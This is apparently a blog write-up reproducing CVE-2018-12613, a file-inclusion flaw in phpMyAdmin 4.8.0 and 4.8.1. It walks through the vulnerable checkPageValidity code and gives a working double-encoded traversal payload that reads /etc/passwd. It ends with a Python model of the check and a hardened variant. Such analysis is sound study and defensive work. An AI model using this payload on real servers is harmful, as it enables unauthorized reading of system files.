[Vulnerability reproduction] CVE-2018-12613 (remote file inclusion)
2022-08-09 08:41:00 【z.volcano】
Affected versions
phpMyAdmin 4.8.0 and 4.8.1
Environment
https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
After downloading the source you can set up the environment locally with phpstudy; I did it directly in the existing environment on BUUOJ.
Vulnerability analysis
In this code (index.php), the `if` statement checks five conditions in a row:
```php
if (! empty($_REQUEST['target'])                        # the target parameter must not be empty
    && is_string($_REQUEST['target'])                   # the value passed in target must be a string
    && ! preg_match('/^index/', $_REQUEST['target'])    # the value passed in target must not start with "index"
    && ! in_array($_REQUEST['target'], $target_blacklist) # the value passed in target must not appear in $target_blacklist
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}
```
`$_REQUEST` is used here, so both the POST and the GET method are supported.
The `$target_blacklist` mentioned in the second-to-last condition is essentially a blacklist that restricts the incoming value:
```php
$target_blacklist = array (
    'import.php', 'export.php'
);
```
The last condition is `checkPageValidity`:
```php
public static function checkPageValidity(&$page, array $whitelist = [])
{
    if (empty($whitelist)) {
        # if $whitelist is empty, fall back to $goto_whitelist
        $whitelist = self::$goto_whitelist;
    }
    if (! isset($page) || !is_string($page)) {
        # if $page is not set, or $page is not a string, return false
        return false;
    }
    if (in_array($page, $whitelist)) {
        # if $page equals one of the values in $whitelist, return true
        return true;
    }
    $_page = mb_substr( # $_page is $page truncated before the query string, e.g. if $page=index.php?a=123 then $_page=index.php
        $page,
        0,
        mb_strpos($page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        # if $_page equals one of the values in $whitelist, return true
        return true;
    }
    $_page = urldecode($page); # the breakthrough point
    $_page = mb_substr( # $_page is the decoded value truncated before the query string
        $_page,
        0,
        mb_strpos($_page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        # if $_page equals one of the values in $whitelist, return true
        return true;
    }
    return false;
}
```
Here `in_array($page, $whitelist)` is executed four times in total. What is interesting is that a successful match returns true, but a failed match does not return false; the function simply falls through to the next check. This is what makes it possible to construct the payload later.
The breakthrough point is `$_page = urldecode($page);`. If we construct the input so that a `?` only appears after decoding, then the subsequent truncation of `$_page` to the value before the parameters (i.e. the content before the `?`) can be exploited.
Exploitation
`?target=db_sql.php%253f/../../../../../../../../etc/passwd`
Because `%253f` becomes `?` after two rounds of URL decoding, the whole thing turns into
`?target=db_sql.php?/../../../../../../../../etc/passwd`
After truncation `$_page` is `db_sql.php`, which is in `$whitelist`; the condition is satisfied and true is returned.
The directory traversal succeeds.
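To make the control flow above concrete, here is an added Python model of the two checks (my own re-implementation, not phpMyAdmin's PHP). It reports which `in_array` branch accepts a value, shows that the page's payload is accepted only by the `urldecode` branch, and contrasts it with an exact-allowlist variant that I assume as a fix (it is not the project's actual patch). The whitelist is a constructed excerpt of `$goto_whitelist`.

```python
from urllib.parse import unquote

# Constructed excerpt of phpMyAdmin's $goto_whitelist and $target_blacklist
# (assumption: only the entries needed for this walkthrough are listed).
GOTO_WHITELIST = ["db_sql.php", "server_sql.php", "sql.php", "tbl_sql.php"]
TARGET_BLACKLIST = ["import.php", "export.php"]


def before_query(s: str) -> str:
    """Mirror of mb_substr($s, 0, mb_strpos($s . '?', '?')): text before the first '?'."""
    return s[: (s + "?").find("?")]


def check_page_validity(page, whitelist=GOTO_WHITELIST):
    """Model of Core::checkPageValidity() in 4.8.1. Returns the name of the branch
    that accepted the value (where PHP returns true), or None (where PHP returns false)."""
    if not isinstance(page, str):
        return None
    if page in whitelist:
        return "exact"
    if before_query(page) in whitelist:
        return "prefix"
    # The flaw: $_REQUEST was already URL-decoded once by PHP, so this second decode
    # lets an encoded '?' (%3f) appear only inside the check, never in the include path.
    if before_query(unquote(page)) in whitelist:
        return "decoded-prefix"
    return None


def index_accepts_target(target) -> bool:
    """Model of the guard in index.php: True means `include $_REQUEST['target']` runs."""
    return bool(
        target
        and isinstance(target, str)
        and not target.startswith("index")
        and target not in TARGET_BLACKLIST
        and check_page_validity(target)
    )


def hardened_accepts_target(target) -> bool:
    """Assumed defensive variant (not phpMyAdmin's own patch): no second decode and an
    exact allowlist match, so only a listed filename can ever reach include."""
    return isinstance(target, str) and target in GOTO_WHITELIST


if __name__ == "__main__":
    # What PHP sees after the web server decodes the page's target=db_sql.php%253f/... once.
    received = "db_sql.php%3f/../../../../../../../../etc/passwd"
    print(check_page_validity(received))      # decoded-prefix
    print(index_accepts_target(received))     # True
    print(hardened_accepts_target(received))  # False
```

The first two branches never see a `?` in the received string, so the request only passes through the `urldecode` branch, while the string handed to `include` still contains `%3f` rather than `?`.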